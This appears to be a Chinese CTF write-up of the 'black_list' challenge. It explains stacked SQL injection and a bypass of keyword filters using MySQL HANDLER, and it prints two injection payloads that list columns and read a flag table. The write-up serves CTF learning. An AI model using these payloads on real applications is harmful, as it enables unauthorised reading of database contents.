black_list(i春秋新春公益赛)

考点：堆叠注入，handler用法

首先使用堆叠语法可以看到包含两个表，此题是在强网杯的随便注上进行的改编，多过了一些字符，当进行fuzz测试时可以看到过滤语句

1′;show columns from FlagHere;#

到此智能看到字段中内容，强网杯中那道随便注的绕过方法全被过滤了，那题可在buu上找到复现环境，接下来介绍一种新的绕过方式handler

payload:1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;

接下来我们学习以下handler的操作。

handler的语法：

HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE

使用某个表的前提必须先open，才可以进行read，最后要进行close

我们本地演示一下，进入mysql的命令行状态

首先可以看到我们的数据库中的库，表信息，接下来查看users表中的所有信息

我们使用handler对users表中数据进行查询，这里注意仔细对照前面的语法。

最后记得将其关闭。